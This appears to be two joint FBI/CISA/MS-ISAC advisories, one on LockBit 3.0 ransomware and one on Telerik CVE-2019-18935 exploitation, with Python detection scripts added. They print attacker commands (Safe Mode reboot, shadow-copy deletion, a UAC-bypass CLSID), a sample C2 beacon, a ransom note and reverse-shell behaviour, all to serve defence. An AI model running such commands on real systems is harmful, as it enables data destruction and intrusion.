Note: this joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
Actions to take today to mitigate cyber threats from ransomware:
The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing & Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known LockBit 3.0 ransomware IOCs and TTPs identified through FBI investigations as recently as March 2023.
The LockBit 3.0 ransomware operation functions as a Ransomware-as-a-Service (RaaS) model and is a continuation of the previous versions of the ransomware, LockBit 2.0 and LockBit. Since January 2020, LockBit has functioned as an affiliate-based ransomware variant; affiliates deploying the LockBit RaaS use many varying TTPs and attack a wide range of businesses and critical infrastructure organizations, which can make effective computer network defense and mitigation challenging.
The FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK for Enterprise.
CAPABILITIES
LockBit 3.0, also known as “LockBit Black,” is more modular and evasive than its previous versions and shares similarities with Blackmatter and Blackcat ransomware.
LockBit 3.0 is configured upon compilation with many different options that determine the behavior of the ransomware. Upon the actual execution of the ransomware within a victim environment, various arguments can be supplied to further modify the behavior of the ransomware. For example, LockBit 3.0 accepts additional arguments for specific operations in lateral movement and rebooting into Safe Mode (see LockBit Command Line Parameters under Indicators of Compromise). If a LockBit affiliate does not have access to passwordless LockBit 3.0 ransomware, then a password argument is mandatory during the execution of the ransomware. LockBit 3.0 affiliates failing to enter the correct password will be unable to execute the ransomware [T1480.001]. The password is a cryptographic key which decodes the LockBit 3.0 executable. By protecting the code in such a manner, LockBit 3.0 hinders malware detection and analysis, with the code being unexecutable and unreadable in its encrypted form. Signature-based detections may fail to detect the LockBit 3.0 executable, as the executable’s encrypted portion will vary based on the cryptographic key used for encryption while also generating a unique hash. When provided the correct password, LockBit 3.0 will decrypt the main component, continue to decrypt or decompress its code, and execute the ransomware.
LockBit 3.0 will only infect machines that do not have language settings matching a defined exclusion list. However, whether a system language is checked at runtime is determined by a configuration flag originally set at compilation time. Languages on the exclusion list include, but are not limited to, Romanian (Moldova), Arabic (Syria), and Tatar (Russia). If a language from the exclusion list is detected [T1614.001], LockBit 3.0 will stop execution without infecting the system.
INITIAL ACCESS
Affiliates deploying LockBit 3.0 ransomware gain initial access to victim networks via remote desktop protocol (RDP) exploitation [T1133], drive-by compromise [T1189], phishing campaigns [T1566], abuse of valid accounts [T1078], and exploitation of public-facing applications [T1190].
EXECUTION AND INFECTION PROCESS
During the malware routine, if privileges are not sufficient, LockBit 3.0 attempts to escalate to the required privileges [TA0004]. LockBit 3.0 performs functions such as:
Enumerating system information such as hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices [T1082]
Enabling automatic logon for persistence and privilege escalation [T1547]
Deleting log files, files in the recycle bin folder, and shadow copies residing on disk [T1485], [T1490]
LockBit 3.0 attempts to spread across a victim network by using a preconfigured list of credentials hardcoded at compilation time or a compromised local account with elevated privileges [T1078]. When compiled, LockBit 3.0 may also enable options for spreading via Group Policy Objects and PsExec using the Server Message Block (SMB) protocol. LockBit 3.0 attempts to encrypt [T1486] data saved to any local or remote device, but skips files associated with core system functions.
After files are encrypted, LockBit 3.0 drops a ransom note with the new filename <Ransomware ID>.README.txt and changes the host’s wallpaper and icons to LockBit 3.0 branding [T1491.001]. If needed, LockBit 3.0 will send encrypted host and bot information to a command and control (C2) server [T1027].
Once completed, LockBit 3.0 may delete itself from the disk [T1070.004] as well as any Group Policy updates that were made, depending on which options were set at compilation time.
EXFILTRATION
LockBit 3.0 affiliates use Stealbit, a custom exfiltration tool used previously with LockBit 2.0 [TA0010]; rclone, an open-source command line cloud storage manager [T1567.002]; and publicly available file sharing services, such as MEGA [T1567.002], to exfiltrate sensitive company data files prior to encryption. While rclone and many publicly available file sharing services are primarily used for legitimate purposes, they can also be used by threat actors to aid in system compromise, network exploration, or data exfiltration. LockBit 3.0 affiliates often use other publicly available file sharing services to exfiltrate data as well [T1567] (see Table 1).
Table 1: Anonymous File Sharing Sites Used to Exfiltrate Data Before System Encryption
File Sharing Site
https://www.premiumize[.]com
https://anonfiles[.]com
https://www.sendspace[.]com
https://fex[.]net
https://transfer[.]sh
https://send.exploit[.]in
LEVERAGING FREEWARE AND OPEN-SOURCE TOOLS
LockBit affiliates have been observed using various freeware and open-source tools during their intrusions. These tools are used for a range of activities such as network reconnaissance, remote access and tunneling, credential dumping, and file exfiltration. Use of PowerShell and Batch scripts is observed across most intrusions, which focus on system discovery, reconnaissance, password/credential hunting, and privilege escalation. Artifacts of professional penetration-testing tools such as Metasploit and Cobalt Strike have also been observed. See Table 2 for a list of legitimate freeware and open-source tools LockBit affiliates have repurposed for ransomware operations:
Table 2: Freeware and Open-Source Tools Used by LockBit 3.0 Affiliates
The IOCs and malware characteristics outlined below were derived from field analysis. The following samples are current as of March 2023.
LockBit 3.0 Black Icon
LockBit 3.0 Wallpaper
LockBit Command Line Parameters

LockBit Parameters            Description
-del                          Self-delete.
-gdel                         Remove LockBit 3.0 group policy changes.
-gspd                         Spread laterally via group policy.
-pass (32 character value)    (Required) Password used to launch LockBit 3.0.
-path (File or path)          Only encrypts provided file or folder.
-psex                         Spread laterally via admin shares.
-safe                         Reboot host into Safe Mode.
-wall                         Sets LockBit 3.0 wallpaper and prints out LockBit 3.0 ransom note.
Mutual Exclusion Object (Mutex) Created
When executed, LockBit 3.0 will create the mutex Global\<MD4 hash of machine GUID> and check to see if this mutex has already been created to avoid running more than one instance of the ransomware.
UAC Bypass via Elevated COM Interface
LockBit 3.0 is capable of bypassing User Account Control (UAC) to execute code with elevated privileges via an elevated Component Object Model (COM) interface. C:\Windows\System32\dllhost.exe is spawned with high integrity with the command line GUID {3E5FC7F9-9A51-4367-9063-A120244FBEC7}.
For example, %SYSTEM32%\dllhost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}.
Volume Shadow Copy Deletion
LockBit 3.0 uses Windows Management Instrumentation (WMI) to identify and delete Volume Shadow Copies. LockBit 3.0 uses select * from Win32_ShadowCopy to query for Volume Shadow copies, Win32_ShadowCopy.ID to obtain the ID of the shadow copy, and DeleteInstance to delete any shadow copies.
LockBit 3.0 has a Safe Mode feature to circumvent endpoint antivirus and detection. Depending upon the host operating system, the following command is launched to reboot the system to Safe Mode with Networking:

Operating System    Safe Mode with Networking command
Vista and newer     bcdedit /set {current} safeboot network
Pre-Vista           bootcfg /raw /a /safeboot:network /id 1

Operating System    Disable Safe Mode reboot
Vista and newer     bcdedit /deletevalue {current} safeboot
Pre-Vista           bootcfg /raw /fastdetect /id 1
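As an added detection example (not part of the advisory), the following Python function flags the host artifacts described above in process-creation telemetry: dllhost.exe launched at high integrity with the elevated COM CLSID, the bcdedit/bootcfg Safe Mode reboot commands, and the LockBit 3.0 command line parameters from the table. The event records and the second CLSID are constructed test data; the field names (image, cmdline, integrity) are assumptions about what an EDR or Event ID 4688 record provides.

```python
import re
from typing import Dict, List, Tuple

# CLSID of the elevated COM interface named in the advisory (dllhost.exe /Processid:{...}).
ELEVATED_COM_CLSID = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"

# Safe Mode with Networking reboot commands from the advisory's table.
SAFEBOOT_VISTA = re.compile(r"\bbcdedit(?:\.exe)?\s+/set\s+\{current\}\s+safeboot\s+network\b", re.I)
SAFEBOOT_PREVISTA = re.compile(r"\bbootcfg(?:\.exe)?\s+/raw\s+/a\s+/safeboot:network\b", re.I)

# LockBit 3.0 requires "-pass <32 character value>"; the other switches are optional.
LOCKBIT_PASS = re.compile(r"(?<!\S)-pass\s+\S{32}(?!\S)")
LOCKBIT_FLAGS = ("-del", "-gdel", "-gspd", "-path", "-psex", "-safe", "-wall")


def scan_event(event: Dict[str, str]) -> List[str]:
    """Return the indicator names matched by one process-creation record.

    Expected keys (an assumption about the telemetry source): image (full path
    of the new process), cmdline (its command line), integrity (Low/Medium/High).
    """
    findings: List[str] = []
    image = event["image"].lower()
    cmdline = event["cmdline"]

    # UAC bypass via elevated COM interface: dllhost.exe hosting the CLSID at high integrity.
    if (image.endswith("\\dllhost.exe")
            and ELEVATED_COM_CLSID.lower() in cmdline.lower()
            and event.get("integrity", "").lower() == "high"):
        findings.append("uac_bypass_elevated_com")

    # Reboot into Safe Mode with Networking (either OS generation).
    if SAFEBOOT_VISTA.search(cmdline) or SAFEBOOT_PREVISTA.search(cmdline):
        findings.append("safe_mode_reboot")

    # LockBit 3.0 launch: mandatory -pass plus any of the documented switches.
    if LOCKBIT_PASS.search(cmdline):
        present = [f for f in LOCKBIT_FLAGS
                   if re.search(r"(?<!\S)" + re.escape(f) + r"(?!\S)", cmdline)]
        findings.append("lockbit_parameters:" + ",".join(["-pass"] + present))
    return findings


def scan_events(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Scan a list of records; return (record index, indicator) pairs."""
    return [(i, f) for i, ev in enumerate(events) for f in scan_event(ev)]


# Constructed sample records (not real telemetry). Record 4 uses a made-up CLSID
# at medium integrity as a benign control; record 5 is ordinary user activity.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\dllhost.exe", "integrity": "High",
     "cmdline": r"C:\Windows\System32\dllhost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"},
    {"image": r"C:\Windows\System32\bcdedit.exe", "integrity": "High",
     "cmdline": "bcdedit /set {current} safeboot network"},
    {"image": r"C:\Windows\System32\bootcfg.exe", "integrity": "High",
     "cmdline": "bootcfg /raw /a /safeboot:network /id 1"},
    {"image": r"C:\Users\alice\Downloads\update.exe", "integrity": "High",
     "cmdline": "update.exe -pass 0123456789abcdef0123456789abcdef -gspd -psex"},
    {"image": r"C:\Windows\System32\dllhost.exe", "integrity": "Medium",
     "cmdline": r"C:\Windows\System32\dllhost.exe /Processid:{11111111-2222-3333-4444-555555555555}"},
    {"image": r"C:\Windows\System32\notepad.exe", "integrity": "Medium",
     "cmdline": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for index, indicator in scan_events(SAMPLE_EVENTS):
        print(f"record {index}: {indicator}")
```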
Group Policy Artifacts
The following are Group Policy Extensible Markup Language (XML) files identified after a LockBit 3.0 infection:
Once new group policies are added, a PowerShell command using Group Policy update (GPUpdate) applies the new group policy changes to all computers on the AD domain.
~~~ LockBit 3.0 the world’s fastest and most stable ransomware from 2019~~~
>>>>> Your data is stolen and encrypted.
If you don’t pay the ransom, the data will be published on our TOR darknet sites. Keep in mind that once your data appears on our leak site, it could be bought by your competitors at any second, so don’t hesitate for a long time. The sooner you pay the ransom, the sooner your company will be safe.
Network Connections
If configured, LockBit 3.0 will send two HTTP POST requests to one of the C2 servers. Information about the victim host and bot are encrypted with an Advanced Encryption Standard (AES) key and encoded in Base64.
Example of HTTP POST request
POST <Lockbit C2>/?7F6Da=u5a0TdP0&Aojq=&NtN1W=OuoaovMvrVJSmPNaA5&fckp9=FCYyT6b7kdyeEXywS8I8 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain
User-Agent: Safari/537.36 <Lockbit User Agent String>
Host: <Lockbit C2>
Connection: Keep-Alive

LIWy=RJ51lB5GM&a4OuN=<Lockbit ID>&LoSyE3=8SZ1hdlhzld4&DHnd99T=rTx9xGlInO6X0zWW&2D6=Bokz&T1guL=MtRZsFCRMKyBmfmqI&6SF3g=JPDt9lfJIQ&wQadZP=<Base64 encrypted data>Xni=AboZOXwUw&2rQnM4=94L&0b=ZfKv7c&NO1d=M2kJlyus&AgbDTb=xwSpba&8sr=EndL4n0HVZjxPR&m4ZhTTH=sBVnPY&xZDiygN=cU1pAwKEztU&=5q55aFIAfTVQWTEm&4sXwVWcyhy=l68FrIdBESIvfCkvYl
Example of information found in encrypted data
{
  "bot_version":"X",
  "bot_id":"X",
  "bot_company":"X",
  "host_hostname":"X",
  "host_user":"X",
  "host_os":"X",
  "host_domain":"X",
  "host_arch":"X",
  "host_lang":"X",
  "disks_info":[
    { "disk_name":"X", "disk_size":"XXXX", "free_size":"XXXXX" }
  ]
}
LockBit 3.0 will enumerate system information to include hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices.
System Location Discovery: System Language Discovery
LockBit 3.0 actors use (1) rclone, an open source command line cloud storage manager to exfiltrate and (2) MEGA, a publicly available file sharing service for data exfiltration.
LockBit 3.0 changes the host system’s wallpaper and icons to the LockBit 3.0 wallpaper and icons, respectively.
MITIGATIONS
The FBI, CISA, and the MS-ISAC recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of LockBit 3.0’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 7.3] in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud).
Refrain from requiring password changes more frequently than once per year. Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
Require administrator credentials to install software.
Require phishing-resistant multifactor authentication [CPG 1.3] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.
Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.
Segment networks [CPG 8.1] to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement.
Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network [CPG 5.1]. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.
Install, regularly update, and enable real time detection for antivirus software on all hosts.
Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.
Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 1.5].
Disable unused ports.
Consider adding an email banner to emails [CPG 8.3] received from outside your organization.
Disable hyperlinks in received emails.
Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.
Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.
Maintain offline backups of data, and regularly test backup and restoration [CPG 7.3]. By instituting this practice, the organization ensures it will not be severely interrupted or left with only irretrievable data.
Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 3.3].
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, the FBI, CISA, and the MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI, CISA, and the MS-ISAC authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
Select an ATT&CK technique described in this advisory (see Table 3).
Align your security technologies against the technique.
Test your technologies against the technique.
Analyze your detection and prevention technologies performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program, including people, processes, and technologies, based on the data generated by this process.
The FBI, CISA, and the MS-ISAC recommend continually testing your security program at scale and in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
RESOURCES
Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.
The FBI is seeking any information that can be legally shared, including:
Boundary logs showing communication to and from foreign IP addresses
Sample ransom note
Communications with LockBit 3.0 actors
Bitcoin wallet information
Decryptor files
Benign sample of an encrypted file
The FBI, CISA, and MS-ISAC do not encourage paying ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office or CISA at report@cisa.gov. State, local, tribal, and territorial (SLTT) government entities can also report to the MS-ISAC (SOC@cisecurity.org or 866-787-4722).
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, and the MS-ISAC do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, or the MS-ISAC.
From November 2022 through early January 2023, the Cybersecurity and Infrastructure Security Agency (CISA) and authoring organizations identified the presence of indicators of compromise (IOCs) at a federal civilian executive branch (FCEB) agency. Analysts determined that multiple cyber threat actors, including an APT actor, were able to exploit a .NET deserialization vulnerability (CVE-2019-18935) in Progress Telerik user interface (UI) for ASP.NET AJAX, located in the agency’s Microsoft Internet Information Services (IIS) web server. Successful exploitation of this vulnerability allows for remote code execution. According to Progress Software, Telerik UI for ASP.NET AJAX builds before R1 2020 (2020.1.114) are vulnerable to this exploit.[1]
Actions to take today to mitigate malicious cyber activity:
Implement a patch management solution to ensure compliance with the latest security patches.
Validate output from patch management and vulnerability scanning against running services to check for discrepancies and account for all services.
Limit service accounts to the minimum permissions necessary to run services.
CISA, the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint Cybersecurity Advisory (CSA) to provide IT infrastructure defenders with tactics, techniques, and procedures (TTPs), IOCs, and methods to detect and protect against similar exploitation.
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques with corresponding detection and mitigation recommendations.
Overview
CISA and authoring organizations assess that, beginning as late as November 2022, threat actors successfully exploited a .NET deserialization vulnerability (CVE-2019-18935) in an instance of Telerik UI for ASP.NET AJAX Q2 2013 SP1 (version 2013.2.717) running on an FCEB agency’s Microsoft IIS server. This exploit, which results in interactive access with the web server, enabled the threat actors to successfully execute remote code on the vulnerable web server. Though the agency’s vulnerability scanner had the appropriate plugin for CVE-2019-18935, it failed to detect the vulnerability due to the Telerik UI software being installed in a file path it does not typically scan. This may be the case for many software installations, as file paths widely vary depending on the organization and installation method.
In addition to CVE-2019-18935, this version (2013.2.717) of Telerik UI for ASP.NET AJAX contains the following known vulnerabilities: CVE-2017-11357, CVE-2017-11317, and CVE-2017-9248. Analysis suggests that cyber threat actors exploited CVE-2019-18935 in conjunction with either CVE-2017-11357 or CVE-2017-11317. Australian Cyber Security Centre (ACSC) Advisory 2020-004 assesses that exploitation of CVE-2019-18935 is only possible with knowledge of Telerik RadAsyncUpload encryption keys.[2] Threat actors can obtain these keys through either prior knowledge or exploitation of vulnerabilities—CVE-2017-11357 or CVE-2017-11317—present in older, unpatched versions of Telerik released between 2007 and 2017. Forensic evidence is not available to definitively confirm exploitation of either CVE-2017-11357 or CVE-2017-11317.
Threat Actor Activity
CISA and authoring organizations observed multiple cyber threat actors, including an APT actor—hereafter referred to as Threat Actor 1 (TA1)—and known cybercriminal actor XE Group—hereafter referred to as Threat Actor 2 (TA2)—conducting reconnaissance and scanning activities [T1595.002] that correlate to the successful exploitation of CVE-2019-18935 in the agency’s IIS server running Telerik UI for ASP.NET AJAX [T1190].
When exploiting the vulnerability, the threat actors uploaded malicious dynamic-link library (DLL) files (some masqueraded as portable network graphics [PNG] files) [T1105] to the C:\Windows\Temp directory. The malicious files were then executed from the C:\Windows\Temp directory via the w3wp.exe process—a legitimate process that runs on IIS servers. This process is routine for handling requests sent to web servers and delivering content. The review of antivirus logs identified that some DLL files were created [T1055.001] and detected as early as August 2021.
CISA and authoring organizations confirmed that some malicious files dropped on the IIS server are consistent with a previously reported file naming convention that threat actors commonly use when exploiting CVE-2019-18935.[3] The threat actors name the files in the Unix Epoch time format and use the date and time as recorded on the target system. The file naming convention follows the pattern [10 digits].[7 digits].dll (e.g., a file created on October 31, 2022, could be 1667203023.5321205.dll).
The names of some of the PNG files were misleading. For example, file 1596835329.5015914.png, which decodes to August 7, 2020, 21:22:09 UTC, first appeared on October 13, 2022, but the file system shows a creation date of August 7, 2020. The uncorrelated Unix Epoch time format may indicate that the threat actors used the timestomping [T1070.006] technique. This file naming convention is a primary IOC used by the threat actors.
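As an added triage example (not from the advisory or the investigation), the Python below decodes the [10 digits].[7 digits].dll/.png naming convention and checks each name against the file's recorded creation time and the time it was first observed, so that a creation time far older than the first observation, as with the .png example above, is surfaced as a possible timestomping indicator. The listing and its timestamps are constructed; only the first two file names are quoted from the advisory.

```python
import re
from datetime import datetime, timedelta, timezone
from typing import Dict, Iterable, List, Optional, Tuple

# [10 digits].[7 digits].dll (or .png) as described in the advisory.
EPOCH_NAME = re.compile(r"^(?P<secs>\d{10})\.(?P<frac>\d{7})\.(?P<ext>dll|png)$", re.IGNORECASE)


def decode_epoch_name(filename: str) -> Optional[datetime]:
    """Return the UTC time encoded in the 10-digit prefix, or None if the name does not match.

    Only the 10-digit Unix Epoch seconds are decoded; the 7-digit suffix is
    matched but otherwise ignored, since the advisory only gives the digit pattern.
    """
    m = EPOCH_NAME.match(filename)
    if m is None:
        return None
    return datetime.fromtimestamp(int(m.group("secs")), tz=timezone.utc)


def triage_listing(entries: Iterable[Tuple[str, str, str]],
                   tolerance: timedelta = timedelta(hours=1)) -> List[Dict[str, str]]:
    """Compare the time encoded in each name with the file's recorded creation
    time and with the time it was first observed (e.g., in antivirus logs).

    entries: (filename, fs_created_utc ISO 8601, first_seen_utc ISO 8601).
    Verdicts:
      possible_timestomp      creation time predates the first observation by
                              more than `tolerance`
      name_creation_mismatch  encoded time and creation time disagree
      consistent              name, creation time and first observation line up
    Names that do not match the pattern are skipped.
    """
    findings: List[Dict[str, str]] = []
    for name, created_iso, first_seen_iso in entries:
        encoded = decode_epoch_name(name)
        if encoded is None:
            continue
        created = datetime.fromisoformat(created_iso)
        first_seen = datetime.fromisoformat(first_seen_iso)
        if first_seen - created > tolerance:
            verdict = "possible_timestomp"
        elif abs(created - encoded) > tolerance:
            verdict = "name_creation_mismatch"
        else:
            verdict = "consistent"
        findings.append({"file": name, "encoded_utc": encoded.isoformat(),
                         "created_utc": created.isoformat(),
                         "first_seen_utc": first_seen.isoformat(), "verdict": verdict})
    return findings


# Constructed directory listing (not from the incident). The first two names are
# the ones quoted in the advisory; the timestamps are made up to exercise each verdict.
SAMPLE_LISTING = [
    ("1667203023.5321205.dll", "2022-10-31T07:57:03+00:00", "2022-10-31T08:00:00+00:00"),
    ("1596835329.5015914.png", "2020-08-07T21:22:09+00:00", "2022-10-13T00:00:00+00:00"),
    ("1665890187.8690152.dll", "2022-11-20T12:00:00+00:00", "2022-11-20T12:00:05+00:00"),
    ("sortcombat.exe", "2022-10-13T00:00:00+00:00", "2022-10-13T00:00:00+00:00"),
]

if __name__ == "__main__":
    for finding in triage_listing(SAMPLE_LISTING):
        print(finding)
```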
In many cases, malicious artifacts were not available for analysis because the threat actors’ malware—that looks for and removes files with the .dll file extension—removed files [T1070.004] from the C:\Windows\Temp directory. Through full packet data capture analysis and reverse engineering of malicious DLL files, no indications of additional malicious activity or sub-processes were found executed by the w3wp.exe process. CISA observed error messages being sent to the threat actors’ command and control (C2) server when permission restraints prevented the service account from executing the malicious DLLs and writing new files.
Network activity analysis was consistent with the artifacts provided for review. Analysts did not observe evidence of privilege escalation or lateral movement.
Threat Actor 1
CISA and authoring organizations observed TA1 exploiting CVE-2019-18935 for system enumeration beginning in August 2022. The vulnerability allows a threat actor to upload malicious DLLs on a target system and execute them by abusing a legitimate process, e.g., the w3wp.exe process. In this instance, TA1 was able to upload malicious DLL files to the C:\Windows\Temp directory and then achieve remote code execution, executing the DLL files via the w3wp.exe process.
At least nine DLL files were used for discovery [TA0007], C2 [TA0011], and defense evasion [TA0005]. All of the analyzed samples collect network parameters, including host name, domain name, Domain Name System (DNS) server Internet Protocol (IP) address and machine name, Network Basic Input/Output System (NetBIOS) ID, adapter information, IP address, subnet, gateway IP, and Dynamic Host Configuration Protocol (DHCP) server [T1016]. All analyzed samples communicate this collected data to a C2 server at IP address 137.184.130[.]162 or 45.77.212[.]12. The C2 traffic to these IP addresses uses a non-application layer protocol [T1095] by leveraging Transmission Control Protocol (TCP) clear text (i.e., unencrypted) over port 443. Analysis also identified that:
Some of the analyzed samples can load additional libraries; enumerate the system, processes, files, directories [T1083]; and write files.
Other analyzed samples can delete DLL files ending with the .dll extension in the C:\Windows\Temp directory on the server. TA1 may use this capability to hide additional malicious activity on the network.
CISA, in coordination with the authoring organizations, identified and observed the following threat actor IPs and timestamps associated with this activity:
Table 1: Observed TA1 IPs and Timestamps
Threat Actor 2
TA2—identified as likely the cybercriminal actor XE Group—often includes xe[word] nomenclature in original filenames and registered domains. Volexity lists this naming convention and other observed TTPs as common for this threat actor group.[4]
As early as August 2021, CISA and authoring organizations observed TA2 delivering malicious PNG files that, following analysis, were masqueraded DLL files to avoid detection [T1036.005]. Similar to TA1, TA2 exploited CVE-2019-18935 and was able to upload at least three unique DLL files into the C:\Windows\Temp directory that TA2 executed via the w3wp.exe process. These DLL files drop and execute reverse (remote) shell utilities for unencrypted communication with C2 IP addresses associated with the malicious domains listed in Table 2. Note: At the time of analysis, the domains resolved to the listed IP addresses.
Table 2: TA2 IPs and Resolving Domains

IP Address            Resolving Domains
184.168.104[.]171     xework[.]com, xegroups[.]com, hivnd[.]com
144.96.103[.]245      xework[.]com
Analysis of DLL files determined the files listed in Table 3 were dropped, decoded, and attempted to connect to the respective malicious domains. Embedded payloads dropped by the DLL files were observed using the command line utility certutil[.]exe and writing new files as xesvrs[.]exe to invoke reverse shell utilities execution.
Table 3: Identified Malicious Files

Filename: XEReverseShell.exe
Description: DLL files (masqueraded as PNG files) located in the C:\Windows\Temp directory contain a base64 encoded file with the internal name XEReverseShell.exe, which was dropped into the same directory as sortcombat.exe. When executed, the reverse shell utility attempts to connect to xework[.]com or xegroups[.]com to obtain the IP address of the C2 server and port number for unencrypted communication. Note: It is likely the threat actors changed the file extension from .dll to .png to avoid detection.

Filename: Multi-OS_ReverseShell.exe
Description: Reverse shell utility decoded from the base64 encoded file xesmartshell.tmp. When executed, it will attempt to connect to xegroups[.]com or xework[.]com to obtain the IP address of the C2 server and port number for unencrypted communication.

Filename: SortVistaCompat
Description: Base64 encoded payload dropped from Multi-OS_ReverseShell.exe. This file receives the C2 IP and port from xework[.]com.
When the TA2 malware is executed, a DLL file drops an executable (XEReverseShell.exe) that attempts to pull a C2 IP address and port number from xework[.]com or xegroups[.]com.
If no port or IP address is found, the program will exit.
If a port and IP address are found, the program will establish a listener and wait for further commands.
If communication is established between the TA2 malware and the C2:
The malware will identify the operating system (Windows or Linux) and create the appropriate shell (cmd or bash), sending system information back to the C2.
The C2 server may send the command xesetshell, causing the malware to connect to the server and download a file called small.txt—a base64-encoded webshell that the malware decodes and places in the C:\Windows\Temp directory.
The C2 server may send the command xequit, causing the malware to sleep for a period of time determined by the threat actors.
The two files xesmartshell.tmp and SortVistaCompat have the capability to drop an Active Server Pages (ASPX) webshell—a base64 encoded text file small.txt decoded [T1140] as small.aspx [T1505.003]—to enumerate drives; to send, receive, and delete files; and to execute incoming commands. The webshell contains an interface for easily browsing files, directories, or drives on the system, and allows the user to upload or download files to any directory. No webshells were observed to be dropped on the target system, likely due to the abused service account having restrictive write permissions.
Actors used a non-application layer protocol (TCP) for w3wp.exe process exploitation, C2, and enumeration on the IIS server.
DETECTION METHODS
CISA and authoring organizations recommend that organizations review the steps listed in this section and Table 4: Identified ATT&CK Techniques for Enterprise to detect similar activity on IIS servers.
Yara Rule
CISA developed the following YARA rule from the base proof-of-concept code for CVE-2019-18935.[5] Note: Authoring organizations do not guarantee all malicious DLL files (if identified) will use the same code provided in this YARA rule.
CISA, FBI, and MS-ISAC recommend that organizations utilize a centralized log collection and monitoring capability, as well as implement or increase logging and forensic data retention. Longer retention policies improve the availability of data for forensic analysis and aid thorough identification of incident scope.
Centralized log collection and monitoring allows for the discovery of webshell and other exploit activity. For example, organizations should monitor for external connections made from the IIS server to unknown external IP addresses. Logging may also be available—if enabled at the router or firewall—for any outbound connections initiated with PowerShell.
Access- and security-focused firewall (e.g., Web Application Firewall [WAF]) logs can be collected and stored for use in both detection and forensic analysis activities. Organizations should use a WAF to guard against publicly known web application vulnerabilities, in addition to guarding against common web application attacks.
Creation of Malicious DLLs
CISA, FBI, and MS-ISAC recommend that organizations use process monitoring—which provides visibility into file system and application process activity—to detect suspicious executable files running from the C:\Windows\Temp directory. Process monitoring via Windows Event Code 4688 will detect the legitimate w3wp.exe process running suspicious DLL files and other anomalous child processes. Note: Enabling this event may inundate security event logging. Use centralized log collection to prevent log rollover, increase log retention and archiving, and/or enable command line event logging.
Forensic analysis commonly identified the threat actors taking the following steps:
1. Create one of the DLL files (C:\Windows\Temp\1665890187.8690152.dll) by process w3wp.exe PID 6484.
